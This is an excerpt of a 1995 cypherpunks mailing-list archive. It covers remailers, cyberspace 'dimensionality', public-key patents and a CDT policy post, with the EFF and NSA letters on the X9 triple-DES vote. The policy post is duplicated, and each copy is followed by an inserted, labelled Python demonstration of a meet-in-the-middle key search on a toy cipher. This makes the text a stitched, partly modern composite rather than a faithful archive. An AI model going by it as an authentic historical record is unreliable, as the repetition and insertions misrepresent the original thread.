degrees of separation," the 6 "handshakes" that separate nearly any
two people in America, suggests that American society is in some
important sense roughly a 15-17 dimensional space, because in some
sense all 250 million Americans "fit into" a hypersphere of radius 3
(diameter 6) when the dimensionality is around 17. (Or slightly lower,
as the slight corrections to V = r ^ n have to be included, which I'm
not bothering with). What "increased connectivity" does is to increase
dimensionality, about as one would expect from our usual metaphors
about "a multidimensional society" and "the world is
shrinking"...indeed it is shrinking, even as the absolute volume
increases.)"

         Well, what I want to know about this, is:
          what are the symmetries involved in the product?

          (I learned that question this weekend)


"What Cypherpunks should be pushing for, in my view, is this increased
dimensionality. More places to stick things, more places to escape
central control, and more degrees of freedom (which has a nice dual
meaning I once used as the working title for a novel I was working
on)."

I think that this proliferation of places will increase as people find 
immediate, practical or entertaining uses for home pages and places to 
stash info, before they will seek to find places to hide, to evade 
detection, to escape notice, or to blend into the milieu as the aim of 
their cyberspatial activity.

And shouldn't there be some mention of the "hardware" involved in 
making cyberspace possible?  Wouldn't there be some requirement for more 
cables underground to places which don't yet have them, and utility 
companies to manage the flow of electricity, etc?   I don't know a 
great deal about these things, but it's hardly ever mentioned here, as 
though electricity just flows by itself somewhere called 'cyberspace' 
and all one ever has to think about (besides crypto and software 
commands) are how to plug oneself in, like C-3PO.    But somebody has 
to install the plugs in, first.

    ..
Blanc




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Wei Dai" <weidai@eskimo.com>
Date: Mon, 13 Feb 95 11:10:02 PST
To: cypherpunks@toad.com
Subject: Re: Is Cyberspace Rich Enough?
Message-ID: <199502131909.AA13622@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> [deleted]

> But can we do more? One of my own wishes is to see hundreds (nay,
> thousands!) of remailers, as these act as "teleportation booths" which
> can dramatically increase connectivity. (They can increase the
> connectivity in a different way than just straight connections
> can...they "stitch together" otherwise visibly-connected regions with
> unobservable connections, a desirable thing.)

I'm not sure that thousands of remailers will ever exist.  There will 
be little incentive for people to use small remailers, which, because 
of their low traffic, add little untraceability per additional unit of 
latency and monetary costs compared to larger remailers.  Larger 
remailers will also likely have better reputations for 
trustworthiness.  The economics seem to indicate that (if a market 
of remailers is ever established) there will be a small number (less than 
a hundred) of large remailers that are well used and profitable, and 
a larger number of small remailers that are nearly never used.

> [deleted]
 
> * Web access remailers. Like the "anonymous anonymous ftp," why not
> explore combining Web systems with remailers? (Not so great for
> browsing, of course, but there should be some interesting
> possibilities.)

Remailers don't seem to be a good way to access the WWW, which is 
much more efficient when done interactively.  On the other hand, my 
proposed Pipe-net would seem to be perfect for this, and other 
communications that need both untraceability and low latency.

Wei Dai

P.S. People are more likely to respond to things they don't agree 
with (as I did here).  If you write something and no one responds, 
it probably means that everyone except the lurkers agrees with you, so 
take it as a good sign.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLz+uDzl0sXKgdnV5AQFvkwP/XiKF5kYexZUje14rk2iyxlLpLke8EHCY
BbRMFQZFQPk0KFo/8iThSn1Xs0xgHrjud5hmpoBxkR+pKMTPfNx6rbTFoSF3HQtX
VzNacOYflcb/eSjHDS02IhMH5wYeUpmKzBE+K4ZgZ35i7sdx8yoHb8laYp1Trhq5
iQ4fbWNy+UA=
=DiM1
-----END PGP SIGNATURE-----

E-mail: Wei Dai <weidai@eskimo.com>   URL: "http://www.eskimo.com/~weidai"
=================== Exponential Increase of Complexity ===================
--> singularity --> atoms --> macromolecules --> biological evolution
--> central nervous systems --> symbolic communication --> homo sapiens
--> digital computers --> internetworking --> close-coupled automation
--> broadband brain-to-net connections --> artificial intelligence
--> distributed consciousness --> group minds --> ? ? ?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gnu
Date: Mon, 13 Feb 95 12:43:06 PST
To: cypherpunks@toad.com
Subject: CDT POLICY POST No.2 -- X9 TO DEVELOP TRIPLE-DES STANDARDS
Message-ID: <9502132043.AA17858@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


------------------------------------------------------------------------
   ******    ********    *************
  ********   *********   *************   
  **         **      **       ***               POLICY POST  
  **         **      **       ***               
  **         **      **       ***               February 13, 1995
  **         **      **       ***               Number 2
  ********    *********       ***              
   ******    ********         ***
                
  CENTER FOR DEMOCRACY AND TECHNOLOGY
------------------------------------------------------------------------
  A briefing on public policy issues affecting civil liberties online
------------------------------------------------------------------------
CDT POLICY POST 2/13/95                                     Number 2

CONTENTS: (1) X9 Committee Agrees to Develop 3x DES Encryption Standard
          (2) About the Center for Democracy and Technology

This document may be re-distributed freely providing it remains in its 
entirety.
------------------------------------------------------------------------

X9 COMMITTEE AGREES TO DEVELOP 3x DES ENCRYPTION STANDARD 

Major Setback for NSA

The NSA's efforts to push the adoption of the Clipper/Skipjack 
government-escrowed encryption scheme encountered a major 
setback earlier this month with the decision by the 
Accredited Standards Committee X9 to proceed with the 
development of a data security standard based on triple-DES.    

The ASC X9 committee is responsible for setting data security 
standards for the US banking and financial services 
industries.   These industries are heavy users of commercial 
cryptography, and standards developed for this community tend 
to drive the development of applications for the entire 
market.  As a result, the committee's decision to proceed 
with a triple-DES standard has important implications for 
future cryptographic standards and US cryptography policy 
generally.

The NSA, a voting member of the X9 committee, had lobbied 
hard against the proposal.  In a November letter to committee 
members, the NSA threatened to prevent the export of triple-
DES, citing existing US law and potential threats to national 
security (see attached NSA letter).

The decision sets the stage for the development of a next 
generation of security standards based on publicly available, 
non-escrowed encryption schemes.   A battle over the 
exportability of triple-DES applications is also on the 
horizon.

Through export controls on cryptography, the proposed Clipper 
initiative, and interference in the standards setting 
processes, US government policies have consistently sought to 
make strong encryption and other privacy protecting 
technologies unavailable to the general public.  The X9 
decision and development of triple-DES and other alternatives 
to government-escrowed cryptography is an important victory 
in that it will increase the public's access to strong, 
privacy enhancing technologies.

BACKGROUND

Banks and other financial institutions use encryption to 
protect the billions of dollars in transactions and fund 
transfers which flow every day across the world's 
communications networks.  

The current encryption standard used by the banking industry 
is based on DES, which has been available since the early 
1970's.  DES is widely trusted because it has been repeatedly 
tested and is considered by experts to be unbreakable except 
by brute force (trying every possible key combination).  The 
US government has also allowed the limited export of DES.

Despite its popularity, DES is considered to be reaching the 
end of its useful life.   The increasing speed and 
sophistication of computer processing power has begun to 
render DES vulnerable to brute force attacks.  Cryptographers 
have recently demonstrated that DES codes can be cracked in 
as little as three hours with $1 million worth of currently 
available equipment.  As a result, the banking and financial 
services industries have begun to explore alternatives to 
DES.  

Although there are many potential alternatives to DES, 
triple-DES is widely seen as the most practical solution.  
Triple-DES is based on DES, but has been enhanced by 
increasing the key length and by encrypting through multiple 
iterations.   These enhancements make triple-DES less 
vulnerable to brute force attacks.  Triple-DES is also 
popular because it can be easily incorporated into existing 
DES systems and is based on standards and procedures familiar 
to most users.   

NSA SETBACK IS A VICTORY FOR CLIPPER OPPONENTS

In their November letter to X9 committee members, the NSA 
attempted to undermine the attractiveness of triple-DES by 
arguing that it is cryptographically unsound, a potential 
threat to national security, and would not be exportable 
under US law.   The NSA, while offering no specific 
alternative to triple-DES, seemed to be attempting to push 
the committee to adopt the only currently available option -- 
Clipper.

Privacy advocates also lobbied the X9 committee.  In a letter 
sent in advance of the December 1994 ballot, CDT Deputy 
Director Daniel Weitzner (then EFF Deputy Policy Director) 
and EFF board member John Gilmore, an expert in this field, 
sent a letter to X9 committee members urging them to adopt 
the triple-DES standard. A copy of the letter is appended at 
the end of this post.

By agreeing to develop a triple-DES standard, the X9 
committee has clearly and decisively rejected Clipper as a 
solution. This vote thus represents a further repudiation of 
Clipper and yet another victory for opponents of government 
efforts to establish Clipper or other government-escrowed 
solutions as a national standard.

NEXT STEPS

X9F, a subcommittee of the X9 committee, will now develop 
technical standards for implementing triple-DES based 
applications.  This process is expected to take one or two 
years to complete.  Once technical standards are developed, 
the full X9 committee will vote as to whether to implement 
the subcommittee's technical recommendations.

The availability of triple-DES applications received a 
further boost recently with the announcement by AT&T and VLSI 
Technologies that they were developing new data security 
products based on triple-DES. This will presumably provide 
additional options for X9 committee members, but the 
exportability of these products is still in doubt.

The stage is thus set for a further battle between the NSA 
and the X9 committee over the exportability of triple-DES and 
final approval of the X9 standard.  As a sitting member of 
the committee, NSA will presumably continue to lobby against 
efforts by the committee to develop triple-DES applications.  
Furthermore, the banking and financial services industries 
must still persuade the government to allow for the export of 
triple-DES.  

As an opponent of government-escrowed cryptography, CDT 
applauds the recent actions of the X9 committee.  While CDT 
supports the development of a variety of security standards 
and alternatives to DES, we recognize the need of the banking 
and financial services industries to develop a temporary stop-
gap solution. CDT will continue to work towards the 
relaxation of export controls on cryptography and will 
support X9 committee members in their efforts to gain the 
ability to export triple-DES applications.  

For more information contact:

Daniel J. Weitzner, Deputy Director       <djw@cdt.org>
Jonah Seiger, Policy Analyst              <jseiger@cdt.org>

+1.202.637.9800

----------------------------------------------------------

GILMORE/WEITZNER LETTER TO X9 COMMITTEE MEMBERS

November 18, 1994

Dear Accredited Standards Committee-X9 Member:

The X9 Committee is currently voting as to whether to 
recommend the development of a standard for triple-DES (ballot number 
X9/94-LB#28).  The Electronic Frontier Foundation (EFF) strongly urges you to 
vote in favor of the triple-DES standard.

EFF supports the development of a variety of new data 
security standards and alternatives to DES.  We believe the triple-DES standard 
provides the best immediate short term alternative because:

        * The basic algorithm, DES, is strong and has been 
          tested repeatedly.

        * There are no known attacks that succeed against 
          triple-DES.

        * It is clearly no less secure than DES.

        * It eliminates the brute-force problem completely by 
          tripling the key length.

        * It runs at high speeds in easy-to-build chips.

        * It can be easily incorporated into existing systems.

NSA's opposition to triple-DES appears to be an indirect attempt to push
Clipper by eliminating credible alternatives. Clipper is not a viable
alternative to triple-DES, and carries substantial liabilities. There has
been no evidence of foreign acceptance of the standard and the Skipjack
algorithm is classified. The likelihood of any government accepting secret
standards developed by a foreign security agency is slim. Clinton
Administration efforts, through the NSA, to push Clipper as a domestic
standard over the past two years have failed.  

We urge you to carefully consider the alternatives before you 
cast your ballot.  We believe that the triple-DES issue should be 
decided on its own merits.

Sincerely, 

John Gilmore                            
Board of Directors                      
Electronic Frontier Foundation  

Daniel J. Weitzner
Deputy Policy Director
Electronic Frontier Foundation

-------------------------------------------------------------

NSA LETTER TO X9 COMMITTEE MEMBERS

X9 Member:

I will be casting a NO vote on the NWI for triple-DES, Letter 
Ballot X9/94-LB#28.  The reasons are set forth below.  You 
may find these useful as you determine your position.

Jerry Rainville

                NSA REASONS FOR A NEGATIVE VOTE

While NSA supports the use of DES in the global financial 
sector, we believe that standardization of triple-DES is ill-
advised for a number of reasons.

The financial community should be planning to transition to a 
new generation of cryptographic algorithms.  When DES was 
first introduced, it represented the "only game in town".  It 
supported encryption, authentication, key management, and 
secure hashing applications.  With a broader interest in 
security, the market can now support optimized algorithms by 
application.  Going through the expense of installing a stop-
gap can only serve to delay progress in achieving 
interoperable universal appropriate solutions.

While we understand the appeal of a snap-in upgrade, our 
experience has been that any change is expensive, especially 
one where the requirements on the key management system 
change.  We do not agree that replacing DES with triple-DES 
is significantly less expensive than upgrading to more 
appropriate technology.

Tripling of any algorithm is cryptographically unsound.  
Notice that tripling DES, at best, only doubles the length of 
the cryptovariable (key).  Phrased another way, the DES was 
optimized for security at 56 bits.  We cannot vouch that any 
of the schemes for doubling the cryptovariable length of DES 
truly squares security.

We understand the financial community has concerns with 
current key escrow based encryption, however, we are 
committed to searching for answers to those concerns.  But 
the government is also committed to key escrow encryption, 
and we do not believe that the proposal for triple DES is 
consistent with this objective.

US export control policy does not allow for general export of 
DES for encryption, let alone triple-DES.  Proceeding with 
this NWI would place X9 at odds with this long standing 
policy.  It also violates the newly accepted X9 cryptographic 
policy.

The US government has not endorsed triple-DES; manufacturers 
and users may be reluctant to use triple-DES products for 
fear of possible liability.

Finally, further proliferation of triple-DES is counter to 
national security and economic objectives.  We would welcome 
the opportunity to discuss these concerns with an appropriate 
executive of your institution.

---------------------------------------------------------------------

ABOUT THE CENTER FOR DEMOCRACY AND TECHNOLOGY

The Center for Democracy and Technology is a non-profit public interest
organization. The Center's mission is to develop and advocate public
policies that advance constitutional civil liberties and democratic 
values in new computer and communications technologies. 

Contacting us:

General information on CDT can be obtained by sending mail to <info@cdt.org>

www/ftp/gopher archives are currently under construction, and should be up
and running by the middle of March. 

                                 ###
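
The two letters above give different figures for what tripling buys: the
Gilmore/Weitzner letter speaks of tripling the key length, the NSA letter of
at best doubling it. One standard reason for a "doubles" figure is the
meet-in-the-middle attack, shown here as an added example that is not part of
the original post. The 16-bit Feistel cipher, its 10-bit keys and all sample
values are constructed for illustration and are not DES.

```python
"""Meet-in-the-middle on double encryption, using a toy cipher (not DES)."""
from collections import defaultdict

KEY_BITS = 10                 # toy key size (assumption); DES uses 56
KEYS = 1 << KEY_BITS
ROUNDS = 4
# 3 is a primitive root mod 257, so this list is a permutation of 0..255.
SBOX = [pow(3, i, 257) % 256 for i in range(256)]


def round_key(key, i):
    """Rotate the 10-bit key left by 3*i bits and keep the low 8 bits."""
    s = (3 * i) % KEY_BITS
    rotated = ((key << s) | (key >> (KEY_BITS - s))) & (KEYS - 1)
    return rotated & 0xFF


def encrypt(key, block):
    """Toy 4-round Feistel cipher on a 16-bit block."""
    left, right = block >> 8, block & 0xFF
    for i in range(ROUNDS):
        left, right = right, left ^ SBOX[right ^ round_key(key, i)]
    return (left << 8) | right


def decrypt(key, block):
    """Inverse of encrypt(): undo the rounds in reverse order."""
    left, right = block >> 8, block & 0xFF
    for i in reversed(range(ROUNDS)):
        left, right = right ^ SBOX[left ^ round_key(key, i)], left
    return (left << 8) | right


def double_encrypt(k1, k2, block):
    return encrypt(k2, encrypt(k1, block))


def meet_in_the_middle(pairs):
    """Find (k1, k2) consistent with known (plaintext, ciphertext) pairs.

    Returns (candidate key pairs, cipher operations spent in the two sweeps).
    The sweeps cost 2 * 2**KEY_BITS operations, not 2**(2 * KEY_BITS).
    """
    (p0, c0), rest = pairs[0], pairs[1:]
    forward = defaultdict(list)   # middle value -> every k1 that reaches it
    ops = 0
    for k1 in range(KEYS):
        forward[encrypt(k1, p0)].append(k1)
        ops += 1
    candidates = []
    for k2 in range(KEYS):
        middle = decrypt(k2, c0)
        ops += 1
        for k1 in forward.get(middle, ()):
            # The extra pairs filter out chance matches on the middle value.
            if all(double_encrypt(k1, k2, p) == c for p, c in rest):
                candidates.append((k1, k2))
    return candidates, ops


def mitm_work(key_bits, stages):
    """Approximate cipher operations for a meet-in-the-middle search against
    2 or 3 independently keyed stages (time only; table memory is ignored)."""
    if stages not in (2, 3):
        raise ValueError("only double and triple encryption are modelled")
    near = stages // 2            # stages enumerated from the plaintext side
    far = stages - near           # stages enumerated from the ciphertext side
    return 2 ** (key_bits * near) + 2 ** (key_bits * far)


def demo():
    k1, k2 = 0x2A7, 0x13C                    # constructed secret keys
    plaintexts = [0x0000, 0x1234, 0xBEEF]    # constructed known plaintexts
    pairs = [(p, double_encrypt(k1, k2, p)) for p in plaintexts]
    candidates, ops = meet_in_the_middle(pairs)
    return (k1, k2), candidates, ops


if __name__ == "__main__":
    secret, candidates, ops = demo()
    print("secret key pair recovered:", secret in candidates)
    print("cipher operations in the sweeps:", ops, "of", KEYS * KEYS, "key pairs")
    print("56-bit keys, two stages:   about 2^57 operations")
    print("56-bit keys, three stages: about 2^112 operations")
```

With 56-bit keys the same search makes two stages cost about 2^57 operations
and three independently keyed stages about 2^112, which is the sense in which
a 168-bit triple key behaves like a key of roughly double length.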
------------------------------------------------------------------------
   ******    ********    *************
  ********   *********   *************   
  **         **      **       ***               POLICY POST  
  **         **      **       ***               
  **         **      **       ***               February 13, 1995
  **         **      **       ***               Number 2
  ********    *********       ***              
   ******    ********         ***
                
  CENTER FOR DEMOCRACY AND TECHNOLOGY
------------------------------------------------------------------------
  A briefing on public policy issues affecting civil liberties online
------------------------------------------------------------------------
CDT POLICY POST 2/13/95                                     Number 2

CONTENTS: (1) X9 Committee Agrees to Develop 3x DES Encryption Standard
          (2) About the Center for Democracy and Technology

This document may be re-distributed freely providing it remains in its 
entirety.
------------------------------------------------------------------------

X9 COMMITTEE AGREES TO DEVELOP 3x DES ENCRYPTION STANDARD 

Major Setback for NSA

The NSA's efforts to push the adoption the Clipper/Skipjack 
government-escrowed encryption scheme encountered a major 
setback earlier this month with the decision by the 
Accredited Standards Committee X9 to proceed with the 
development of a data security standard based on triple-DES.    

The ASC X9 committee is responsible for setting data security 
standards for the US banking and financial services 
industries.   These industries are heavy users of commercial 
cryptography, and standards developed for this community tend 
to drive the development of applications for the entire 
market.  As a result, the committee's decision to proceed 
with a triple-DES standard has important implications for 
future cryptographic standards and US cryptography policy 
generally.

The NSA, a voting member of the X9 committee, had lobbied 
hard against the proposal.  In a November letter to committee 
members, the NSA threatened to prevent the export of triple-
DES, citing existing US law and potential threats to national 
security (see attached NSA letter).

The decision sets the stage for the development of a next 
generation of security standards based on publicly available, 
non-escrowed encryption schemes.   A battle over the 
exportability of triple-DES applications is also on the 
horizon.

Through export controls on cryptography, the proposed Clipper 
initiative, and interference in the standards setting 
processes, US government policies have consistently sought to 
make strong encryption and other privacy protecting 
technologies unavailable to the general public.  The X9 
decision and development of triple-DES and other alternitives 
to government-escrowed cryptography is an important victory 
in that it will increase the public's access to strong, 
privacy enhancing technologies.

BACKGROUND

Banks and other financial institutions use encryption to 
protect the billions of dollars in transactions and fund 
transfers which flow every day across the world's 
communications networks.  

The current encryption standard used by the banking industry 
is based on DES, which has been available since the early 
1970's.  DES is widely trusted because it has been repeatedly 
tested and is considered by experts to be unbreakable except 
by brute force (trying every possible key combination).  The 
US government has also allowed the limited export of DES.

Despite its popularity, DES is considered to be reaching the 
end of its useful life.   The increasing speed and 
sophistication of computer processing power has begun to 
render DES vulnerable to brute force attacks.  Cryptographers 
have recently demonstrated that DES codes can be cracked in 
as little as three hours with $1 million worth of currently 
available equipment.  As a result, the banking and financial 
services industries have begun to explore alternatives to 
DES.  

Although there are many potential alternatives to DES, 
triple-DES is widely seen as the most practical solution.  
Triple-DES is based on DES, but has been enhanced by 
increasing the key length and by encrypting through multiple 
iterations.   These enhancements make triple-DES less 
vulnerable to brute force attacks.  Triple-DES is also 
popular because it can be easily incorporated into existing 
DES systems and is based on standards and procedures familiar 
to most users.   

NSA SETBACK IS A VICTORY FOR CLIPPER OPPONENTS

In their November letter to X9 committee members, the NSA 
attempted to undermine the attractiveness of triple-DES by 
arguing that it is cryptographically unsound, a potential 
threat to national security, and would not be exportable 
under US law.   The NSA, while offering no specific 
alternative to triple-DES, seemed to be attempting to push 
the committee to adopt the only currently available option -- 
Clipper.

Privacy advocates also lobbied the X9 committee.  In a letter 
sent in advance of the December 1994 ballot, CDT Deputy 
Director Daniel Weitzner (then EFF Deputy Policy Director) 
and EFF board member John Gilmore, an expert in this field, 
sent a letter to X9 committee members urging them to adopt 
the triple-DES standard. A copy of the letter is appended at 
the end of this post.

By agreeing to develop a triple-DES standard, the X9 
committee has clearly and decisively rejected Clipper as a 
solution. This vote thus represents a further repudiation of 
Clipper and yet another victory for opponents of government 
efforts to establish Clipper or other government-escrowed 
solutions as a national standard.

NEXT STEPS

X9F, a subcommittee of the X9 committee, will now develop 
technical standards for implementing triple-DES based 
applications.  This process is expected to take one or two 
years to complete.  Once technical standards are developed, 
the full X9 committee will vote as to whether to implement 
the subcommittee's technical recommendations.

The availability of triple-DES applications received a 
further boost recently with the announcement by AT&T and VLSI 
Technologies that they were developing new data security 
products based on triple-DES. This will presumably provide 
additional options for X9 committee members, but the 
exportability of these products is still in doubt.

The stage is thus set for a further battle between the NSA 
and the X9 committee over the exportability of triple-DES and 
final approval of the X9 standard.  As a sitting member of 
the committee, NSA will presumably continue to lobby against 
efforts by the committee to develop triple-DES applications.  
Furthermore, the banking and financial services industries 
must still persuade the government to allow for the export of 
triple-DES.  

As an opponent of government-escrowed cryptography, CDT 
applauds the recent actions of the X9 committee.  While CDT 
supports the development of a variety of security standards 
and alternatives to DES, we recognize the need of the banking 
and financial services industries to develop a temporary stop-gap 
solution. CDT will continue to work towards the 
relaxation of export controls on cryptography and will 
support X9 committee members in their efforts to gain the 
ability to export triple-DES applications.  

For more information contact:

Daniel J. Weitzner, Deputy Director       <djw@cdt.org>
Jonah Seiger, Policy Analyst              <jseiger@cdt.org>

+1.202.637.9800

----------------------------------------------------------

GILMORE/WEITZNER LETTER TO X9 COMMITTEE MEMBERS

November 18, 1994

Dear Accredited Standards Committee-X9 Member:

The X9 Committee is currently voting as to whether to 
recommend the development of a standard for triple-DES (ballot number 
X9/94-LB#28).  The Electronic Frontier Foundation (EFF) strongly urges you to 
vote in favor of the triple-DES standard.

EFF supports the development of a variety of new data 
security standards and alternatives to DES.  We believe the triple-DES standard 
provides the best immediate short term alternative because:

        * The basic algorithm, DES, is strong and has been 
          tested repeatedly.

        * There are no known attacks that succeed against 
          triple-DES.

        * It is clearly no less secure than DES.

        * It eliminates the brute-force problem completely by 
          tripling the key length.

        * It runs at high speeds in easy-to-build chips.

        * It can be easily incorporated into existing systems.

NSA's opposition to triple-DES appears to be an indirect attempt to push
Clipper by eliminating credible alternatives. Clipper is not a viable
alternative to triple-DES, and carries substantial liabilities. There has
been no evidence of foreign acceptance of the standard and the Skipjack
algorithm is classified. The likelihood of any government accepting secret
standards developed by a foreign security agency is slim. Clinton
Administration efforts, through the NSA, to push Clipper as a domestic
standard over the past two years have failed.  

We urge you to carefully consider the alternatives before you 
cast your ballot.  We believe that the triple-DES issue should be 
decided on its own merits.

Sincerely, 

John Gilmore                            
Board of Directors                      
Electronic Frontier Foundation  

Daniel J. Weitzner
Deputy Policy Director
Electronic Frontier Foundation

-------------------------------------------------------------

NSA LETTER TO X9 COMMITTEE MEMBERS

X9 Member:

I will be casting a NO vote on the NWI for triple-DES, Letter 
Ballot X9/94-LB#28.  The reasons are set forth below.  You 
may find these useful as you determine your position.

Jerry Rainville

                NSA REASONS FOR A NEGATIVE VOTE

While NSA supports the use of DES in the global financial 
sector, we believe that standardization of triple-DES is ill-
advised for a number of reasons.

The financial community should be planning to transition to a 
new generation of cryptographic algorithms.  When DES was 
first introduced, it represented the "only game in town".  It 
supported encryption, authentication, key management, and 
secure hashing applications.  With a broader interest in 
security, the market can now support optimized algorithms by 
application.  Going through the expense of installing a stop-
gap can only serve to delay progress in achieving 
interoperable universal appropriate solutions.

While we understand the appeal of a snap-in upgrade, our 
experience has been that any change is expensive, especially 
one where the requirements on the key management system 
change.  We do not agree that replacing DES with triple-DES 
is significantly less expensive than upgrading to more 
appropriate technology.

Tripling of any algorithm is cryptographically unsound.  
Notice that tripling DES, at best, only doubles the length of 
the cryptovariable (key).  Phrased another way, the DES was 
optimized for security at 56 bits.  We cannot vouch that any 
of the schemes for doubling the cryptovariable length of DES 
truly squares security.

We understand the financial community has concerns with 
current key escrow based encryption, however, we are 
committed to searching for answers to those concerns.  But 
the government is also committed to key escrow encryption, 
and we do not believe that the proposal for triple DES is 
consistent with this objective.

US export control policy does not allow for general export of 
DES for encryption, let alone triple-DES.  Proceeding with 
this NWI would place X9 at odds with this long standing 
policy.  It also violates the newly accepted X9 cryptographic 
policy.

The US government has not endorsed triple-DES; manufacturers 
and users may be reluctant to use triple-DES products for 
fear of possible liability.

Finally, further proliferation of triple-DES is counter to 
national security and economic objectives.  We would welcome 
the opportunity to discuss these concerns with an appropriate 
executive of your institution.

---------------------------------------------------------------------

ABOUT THE CENTER FOR DEMOCRACY AND TECHNOLOGY

The Center for Democracy and Technology is a non-profit public interest
organization. The Center's mission is to develop and advocate public
policies that advance constitutional civil liberties and democratic 
values in new computer and communications technologies. 

Contacting us:

General information on CDT can be obtained by sending mail to <info@cdt.org>

www/ftp/gopher archives are currently under construction, and should be up
and running by the middle of March. 

                                 ###
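
The NSA letter's remark that tripling DES "at best, only doubles" the key length, and the EFF letter's point about tripling the key length, both turn on the textbook meet-in-the-middle attack on cascaded encryption. The following is an added example, not part of the original post or either letter: it runs that attack against double encryption with a constructed toy 16-bit Feistel cipher and 12-bit keys (the cipher, keys, plaintexts and function names are all assumptions made for illustration), then applies the same cost argument to a three-stage cascade of 56-bit keys.

```python
"""Meet-in-the-middle against double encryption, on a constructed toy cipher."""

KEY_BITS = 12                 # toy key size (DES uses 56)
KEYSPACE = 1 << KEY_BITS

# Constructed, fixed 8-bit mixing table used by the Feistel round function.
SBOX = [((i * i * 5 + i * 3 + 7) ^ (i >> 3)) & 0xFF for i in range(256)]


def _round_keys(key):
    """Four 8-bit round keys: the 12-bit key rotated left by 3 bits per round."""
    rks = []
    for i in range(4):
        s = 3 * i
        rot = ((key << s) | (key >> (KEY_BITS - s))) & (KEYSPACE - 1)
        rks.append(rot & 0xFF)
    return rks


def encrypt(key, block):
    """Encrypt one 16-bit block with a 4-round Feistel network."""
    left, right = block >> 8, block & 0xFF
    for rk in _round_keys(key):
        left, right = right, left ^ SBOX[right ^ rk]
    return (left << 8) | right


def decrypt(key, block):
    """Invert encrypt(): undo the rounds in reverse order."""
    left, right = block >> 8, block & 0xFF
    for rk in reversed(_round_keys(key)):
        left, right = right ^ SBOX[left ^ rk], left
    return (left << 8) | right


def double_encrypt(k1, k2, block):
    """Two-stage cascade with independent keys (24 key bits in total)."""
    return encrypt(k2, encrypt(k1, block))


def meet_in_the_middle(pairs):
    """Find (k1, k2) consistent with known (plaintext, ciphertext) pairs.

    Encrypt the first plaintext under every k1, decrypt its ciphertext under
    every k2, and look for matching middle values. Returns the surviving
    candidates and the number of cipher operations spent on the search itself
    (the few confirmation checks on the other pairs are not counted).
    """
    p0, c0 = pairs[0]
    ops = 0
    forward = {}
    for k1 in range(KEYSPACE):
        forward.setdefault(encrypt(k1, p0), []).append(k1)
        ops += 1
    candidates = []
    for k2 in range(KEYSPACE):
        mid = decrypt(k2, c0)
        ops += 1
        for k1 in forward.get(mid, ()):
            # A 16-bit block leaves many accidental matches; filter them
            # with the remaining known pairs.
            if all(double_encrypt(k1, k2, p) == c for p, c in pairs[1:]):
                candidates.append((k1, k2))
    return candidates, ops


def cascade_cost_bits(stages, key_bits):
    """log2 of (time, memory) for the generic meet-in-the-middle attack on a
    cascade of `stages` encryptions with independent keys, ignoring constants."""
    back = stages // 2
    front = stages - back
    return front * key_bits, back * key_bits


def demo():
    k1, k2 = 0x3A7, 0xC15                    # constructed secret keys
    plaintexts = [0x1234, 0xBEEF, 0x0F0F]    # constructed known plaintexts
    pairs = [(p, double_encrypt(k1, k2, p)) for p in plaintexts]
    found, ops = meet_in_the_middle(pairs)
    return (k1, k2) in found, ops, len(found)


if __name__ == "__main__":
    recovered, ops, n = demo()
    print("true key pair among candidates:", recovered, "candidates:", n)
    print("search cost: %d operations, versus %d for trying every key pair"
          % (ops, KEYSPACE * KEYSPACE))
    print("3 stages of 56-bit DES, log2(time, memory):", cascade_cost_bits(3, 56))
```

Doubling the toy key to 24 bits costs the search only 2 x 2^12 cipher operations plus a table of 2^12 entries, and the same split applied to three independent 56-bit keys gives about 2^112 work with 2^56 memory: far beyond single DES, but a doubling rather than a tripling of effective key length.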




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wcs@anchor.ho.att.com
Date: Mon, 13 Feb 95 12:46:28 PST
To: cypherpunks@toad.com
Subject: Re: standards...
Message-ID: <9502132044.AA24186@anchor.ho.att.com>
MIME-Version: 1.0
Content-Type: text/plain


> > AFAIK, RSA is the only feasible PK scheme available.  There's elliptic
> > curves, of course, but that's patented.
> There are plenty of others, like Rabin's scheme, that are quite
> practical, but just not used because they are all collectively
> patented. After that patent expires in '97 things may change.

There are different uses for public-key systems, and some systems
support some but not all of the uses.  For instance,
Diffie-Hellman is useful for key exchange (and patented till 1997),
and the NIST/NSA's DSS Digital Signature Standard is useful for signatures,
especially if you like subliminal channels in your signatures :-), 
though the patent status depends on whether you believe NIST or RSA ....




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenburg Walking-Owl <rrothenb@ic.sunysb.edu>
Date: Mon, 13 Feb 95 09:52:55 PST
To: schneier@chinet.chinet.com
Subject: Re: Factoring - State of the Art and Predictions
In-Reply-To: <m0rdnqt-000k5xC@mailbox.mcs.com>
Message-ID: <199502131750.MAA18574@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain



My knowledge of number theory is negligible, but I've got this one obvious
comment: use algorithms where factoring is not a weakness.

Isn't LUC safe from factoring?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Wei Dai" <weidai@eskimo.com>
Date: Mon, 13 Feb 95 13:07:01 PST
To: cypherpunks@toad.com
Subject: Re: Is Cyberspace Rich Enough?
Message-ID: <199502132106.AA22391@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

> That theme is this: Is cyberspace, or the Net/Web/Etc., sufficiently
> rich or complex to meet our needs?

 [deleted]

> Consider how the abstractions of the World Wide Web, URLs, HTML, HTTP,
> and Web browsers have *increased the size of cyberspace* rather
> dramatically in just the past two years. More places to visit, more
> interconnectedness, more difficulties in controlling access to stuff,
> etc. Home pages containing banned material are proliferating (a la the
> Homolka-Teale ritualistic cannibalism trial in Canada, the Scientology
> material, and so on--this is not the place for me to recap this).
> Sure, ftp sites used to do this pretty well; in fact, I'm considering
> ftp sites in this "evolution" toward greater complexity (in the
> richness sense).

I agree that cyberspace is certainly becoming more complex and
interconnected.  However, just as a complex ecosystem is not necessarily
more stable than a simple one, and a complex cipher is not necessarily
more secure than a simple one, greater complexity in cyberspace does not
necessarily imply that it is less vulnerable to centralized control.

[more stuff deleted]

> What Cypherpunks should be pushing for, in my view, is this increased
> dimensionality. More places to stick things, more places to escape
